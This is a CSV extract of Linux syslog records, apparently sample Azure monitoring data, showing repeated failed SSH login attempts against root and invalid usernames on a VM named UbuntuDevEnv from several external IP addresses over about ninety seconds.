+14458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:20,UbuntuDevEnv,2019-06-26 05:00:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,4083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+14459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:20,UbuntuDevEnv,2019-06-26 05:00:20,auth,UbuntuDevEnv,info,Invalid user butter from 95.216.195.95 port 56758,4083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,butter,95.216.195.9,56758,,
+14460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:20,UbuntuDevEnv,2019-06-26 05:00:19,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 35965 ssh2,4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,35965,,
+14461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:20,UbuntuDevEnv,2019-06-26 05:00:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:23,UbuntuDevEnv,2019-06-26 05:00:22,auth,UbuntuDevEnv,info,Failed password for invalid user butter from 95.216.195.95 port 56758 ssh2,4083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,butter,95.216.195.9,56758,,
+14463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:23,UbuntuDevEnv,2019-06-26 05:00:22,auth,UbuntuDevEnv,info,Disconnected from invalid user butter 95.216.195.95 port 56758 [preauth],4083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,butter,95.216.195.9,56758,,
+14464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:23,UbuntuDevEnv,2019-06-26 05:00:22,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 56758:11: Bye Bye [preauth],4083,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,56758,,
+14465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:23,UbuntuDevEnv,2019-06-26 05:00:23,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 35965 ssh2,4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,35965,,
+14466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:23,UbuntuDevEnv,2019-06-26 05:00:23,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:23,UbuntuDevEnv,2019-06-26 05:00:23,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 35965 ssh2 [preauth],4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,35965,,
+14468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:23,UbuntuDevEnv,2019-06-26 05:00:23,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:23,UbuntuDevEnv,2019-06-26 05:00:23,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 35965: Too many authentication failures [preauth],4015,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,35965,,
+14470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:26,UbuntuDevEnv,2019-06-26 05:00:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:28,UbuntuDevEnv,2019-06-26 05:00:28,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 41699 ssh2,4157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,41699,,
+14472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:37,UbuntuDevEnv,2019-06-26 05:00:36,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 41699 ssh2],4157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,41699,,
+14473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:39,UbuntuDevEnv,2019-06-26 05:00:38,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 41699 ssh2,4157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,41699,,
+14474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:42,UbuntuDevEnv,2019-06-26 05:00:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 41699 ssh2,4157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,41699,,
+14475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:42,UbuntuDevEnv,2019-06-26 05:00:42,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 41699 ssh2 [preauth],4157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,41699,,
+14476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:42,UbuntuDevEnv,2019-06-26 05:00:42,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 41699: Too many authentication failures [preauth],4157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,41699,,
+14477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:42,UbuntuDevEnv,2019-06-26 05:00:42,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:42,UbuntuDevEnv,2019-06-26 05:00:42,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:45,UbuntuDevEnv,2019-06-26 05:00:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:00:48,UbuntuDevEnv,2019-06-26 05:00:47,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 59065 ssh2,4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,59065,,
+14481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:01,UbuntuDevEnv,2019-06-26 05:00:59,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 59065 ssh2],4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,59065,,
+14482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:03,UbuntuDevEnv,2019-06-26 05:01:02,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:03,UbuntuDevEnv,2019-06-26 05:01:02,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 59065: Too many authentication failures [preauth],4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,59065,,
+14484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:03,UbuntuDevEnv,2019-06-26 05:01:02,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:03,UbuntuDevEnv,2019-06-26 05:01:02,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 59065 ssh2 [preauth],4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,59065,,
+14486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:03,UbuntuDevEnv,2019-06-26 05:01:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 59065 ssh2,4225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,59065,,
+14487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:06,UbuntuDevEnv,2019-06-26 05:01:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:09,UbuntuDevEnv,2019-06-26 05:01:08,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20979 ssh2,4298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20979,,
+14489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:24,UbuntuDevEnv,2019-06-26 05:01:23,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 20979 ssh2],4298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20979,,
+14490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:24,UbuntuDevEnv,2019-06-26 05:01:23,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 20979: Too many authentication failures [preauth],4298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,20979,,
+14491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:24,UbuntuDevEnv,2019-06-26 05:01:23,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 20979 ssh2 [preauth],4298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20979,,
+14492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:24,UbuntuDevEnv,2019-06-26 05:01:23,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:24,UbuntuDevEnv,2019-06-26 05:01:23,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:26,UbuntuDevEnv,2019-06-26 05:01:25,auth,UbuntuDevEnv,info,Invalid user prestashop from 196.41.208.238 port 6716,4376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,196.41.208.2,6716,,
+14495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:26,UbuntuDevEnv,2019-06-26 05:01:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:26,UbuntuDevEnv,2019-06-26 05:01:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,4376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+14497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:27,UbuntuDevEnv,2019-06-26 05:01:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:28,UbuntuDevEnv,2019-06-26 05:01:27,auth,UbuntuDevEnv,info,Failed password for invalid user prestashop from 196.41.208.238 port 6716 ssh2,4376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,196.41.208.2,6716,,
+14499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:28,UbuntuDevEnv,2019-06-26 05:01:27,auth,UbuntuDevEnv,info,Disconnected from invalid user prestashop 196.41.208.238 port 6716 [preauth],4376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prestashop,196.41.208.2,6716,,
+14500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:28,UbuntuDevEnv,2019-06-26 05:01:27,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 6716:11: Bye Bye [preauth],4376,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,6716,,
+14501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:29,UbuntuDevEnv,2019-06-26 05:01:29,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27938 ssh2,4380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27938,,
+14502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:36,UbuntuDevEnv,2019-06-26 05:01:35,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 27938 ssh2],4380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27938,,
+14503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:36,UbuntuDevEnv,2019-06-26 05:01:36,auth,UbuntuDevEnv,info,Invalid user serveur from 5.135.161.72 port 51586,4418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serveur,5.135.161.7,51586,,
+14504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:36,UbuntuDevEnv,2019-06-26 05:01:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:36,UbuntuDevEnv,2019-06-26 05:01:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,4418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:38,UbuntuDevEnv,2019-06-26 05:01:38,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27938 ssh2,4380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27938,,
+14507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:38,UbuntuDevEnv,2019-06-26 05:01:38,auth,UbuntuDevEnv,info,Failed password for invalid user serveur from 5.135.161.72 port 51586 ssh2,4418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serveur,5.135.161.7,51586,,
+14508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:38,UbuntuDevEnv,2019-06-26 05:01:38,auth,UbuntuDevEnv,info,Disconnected from invalid user serveur 5.135.161.72 port 51586 [preauth],4418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,serveur,5.135.161.7,51586,,
+14509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:38,UbuntuDevEnv,2019-06-26 05:01:38,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 51586:11: Bye Bye [preauth],4418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,51586,,
+14510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:42,UbuntuDevEnv,2019-06-26 05:01:41,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27938 ssh2,4380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27938,,
+14511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:44,UbuntuDevEnv,2019-06-26 05:01:44,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 27938: Too many authentication failures [preauth],4380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,27938,,
+14512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:44,UbuntuDevEnv,2019-06-26 05:01:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 27938 ssh2,4380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27938,,
+14513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:44,UbuntuDevEnv,2019-06-26 05:01:44,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 27938 ssh2 [preauth],4380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,27938,,
+14514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:44,UbuntuDevEnv,2019-06-26 05:01:44,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:44,UbuntuDevEnv,2019-06-26 05:01:44,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,4380,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:01:47,UbuntuDevEnv,2019-06-26 05:01:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,4448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
